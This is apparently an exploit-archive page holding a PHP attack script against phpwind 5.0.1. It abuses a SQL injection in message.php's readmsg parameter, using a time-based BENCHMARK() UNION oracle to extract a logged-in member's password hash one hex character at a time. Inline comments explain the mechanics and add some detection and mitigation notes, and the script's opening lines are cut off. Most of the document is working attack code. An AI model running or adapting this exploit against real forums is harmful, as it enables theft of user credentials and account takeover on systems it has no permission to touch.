phpwind 5.0.1 SQL Injection Vulnerability Exploit
SEBUG-ID:6703
SEBUG-Appdir:PHPWind
Published:2007-04-26
Exploit:
[www.sebug.net]
The following procedures (methods) may contain offensive material; they are provided only for security research and teaching. Use them at your own risk!
0 ? intval($argv[3]):1;
echo \"\\r\\n#Logging\\t........\";
if(islogin()) echo \"Login Ok!\\r\\n\";
else die(\"Not Login!\\tCheck Your Cookie and Useragent!\\r\\n\");
echo \"#Testing\\t........\";
if(test()) echo \"Vul!\\r\\n\";
else die(\"Not Vul\");
$hashtable=\'0123456789abcdef\';
$count=0;
echo \"#Cracking\\t\\r\\n\\r\\n\";
for($i=1;$i<=16;$i++){
echo \"第\\t$i\\t位:\";
$subpass=crack($i+8);
$password=$password.$subpass;
echo \"$subpass\\r\\n\";
}
echo \"Password:\\t$password\";
echo \"\\r\\nGood Luck $count Times\\r\\n\";
function send($cmd,$path)
{
// Transport used by every probe in this script: hand-builds an HTTP/1.1 POST
// to $server on port 80 for $bbspath.$path, with body $cmd and the globally
// configured Cookie and User-Agent, and returns the raw response text.
// Because the header set is fixed (Accept-Language: zh-cn, Connection:
// Keep-Alive although the socket is closed after one read), all probes look
// alike in a web server log: repeated POSTs to the same path from one client.
// $count is incremented per request so the caller can report request volume.
// $evilip is declared global but not used in this function.
global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;
$path=$bbspath.\"$path\";
$message = \"POST \".$path.\" HTTP/1.1\\r\\n\";
$message .= \"Accept: */*\\r\\n\";
$message .= \"Accept-Language: zh-cn\\r\\n\";
$message .= \"Referer: http://\".$server.$path.\"\\r\\n\";
$message .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";
$message .= \"User-Agent: \".$useragent.\"\\r\\n\";
$message .= \"Host: \".$server.\"\\r\\n\";
$message .= \"Content-length: \".strlen($cmd).\"\\r\\n\";
$message .= \"Connection: Keep-Alive\\r\\n\";
$message .= \"Cookie: \".$cookie.\"\\r\\n\";
$message .= \"\\r\\n\";
$message .= $cmd.\"\\r\\n\";
$count=$count+1;
// No error handling on the socket: a failed fsockopen() only skips the read
// loop below (fputs/fclose would still be called on false), and there is no
// read timeout, so a slow or hanging server blocks the whole script.
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = \"\";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
// Appending an empty string has no effect; left as in the original.
$resp .=\"\";
// With $debug set, the request body and full response are echoed.
if($debug) {echo $cmd;echo $resp;}
// echo $resp;
return $resp;
}
function sqlject($sql){
// Time-based boolean oracle. The readmsg parameter is closed with a paren
// and extended with a UNION SELECT whose BENCHMARK() call only executes
// when $sql evaluates true for the pw_members row with uid=$uid; the trailing
// /* comments out the remainder of the original query. The page prints its
// own generation time after a Total marker, and a value above 2 (units as
// rendered by the page) is taken to mean the BENCHMARK ran, i.e. $sql held.
// Detection: BENCHMARK(, union select and /* inside a message.php POST body,
// repeated many times with only the mid() position or compared byte changing.
// Mitigation: the readmsg value must be treated as an integer (cast or
// parameterised) before it reaches SQL, and DB timing should not be echoed.
// $uid is presumably the account the supplied cookie belongs to - set outside
// this view, verify against the argv parsing above.
global $uid;
$data=\'action=pubmsg&readmsg=0)\';
$data=$data.\" union select BENCHMARK(1000000,md5(12345)) from pw_members where uid=$uid and $sql\".\'/*\';
$echo=send($data,\'message.php\');
preg_match(\"/Total (.*)\\(/i\",$echo,$matches);
// $matches[1] is the captured string compared loosely against 2; if the
// response carries no Total marker the index is undefined and the test fails.
if($matches[1]>2) return 1;
else return 0;
}
function test(){
// Vulnerability check: sends readmsg=0) (an unbalanced parenthesis) and
// treats a MySQL Server Error string in the response as proof that the
// parameter reaches the SQL layer unsanitised. The verbose database error
// page is the confirming signal; suppressing DB errors from user-facing
// output removes this signal but does not remove the injection itself.
// Note strpos() returns 0 (falsy) for a match at offset 0, so this check
// relies on the marker never appearing at the very start of the response.
// $uid is declared global but unused here.
global $uid;
$data=\'action=pubmsg&readmsg=0)\';
$echo=send($data,\'message.php\');
if(strpos($echo,\'MySQL Server Error\')) return 1;
else return 0;
}
function islogin(){
// Session check: sends the same probe with the configured Cookie and returns
// 0 if the response refers to login.php (the cookie was rejected, i.e. the
// client is not logged in), else 1. Same strpos() truthiness caveat as
// test(): a match at offset 0 would be read as no match.
// $uid is declared global but unused here.
global $uid;
$data=\'action=pubmsg&readmsg=0)\';
$echo=send($data,\'message.php\');
if(strpos($echo,\'login.php\"\')) return 0;
else return 1;
}
function crack($i){
// Recovers the single hex character at position $i of the password column
// (the caller above passes $i+8 for i = 1..16) through the sqlject() oracle.
// A first comparison against 0x38 ('8') decides which half of $hashtable to
// scan; the two ranges overlap at index 8, and 8..15 covers '8'..'f'.
// Each candidate in the chosen half is then tested for equality, so one
// character costs up to ten oracle requests - in logs this appears as a
// burst of near-identical message.php POSTs per recovered character.
// If no candidate matches (for example a timing false negative), the
// function calls itself again but discards that call's return value, so the
// caller then receives null for this position.
global $hashtable;
$sql=\"mid(password,$i,1)>0x\".bin2hex(\'8\');
if(sqlject($sql)){
$a=8;
$b=15;}
else {
$a=0;
$b=8;
}
for($tmp=$a;$tmp<=$b;$tmp++){
$sql=\"mid(password,$i,1)=0x\".bin2hex($hashtable[$tmp]);
if(sqlject($sql)) return $hashtable[$tmp];
}
// Retry on miss; result is not returned (see note above).
crack($i);
}
?>// sebug.net [2007-04-26]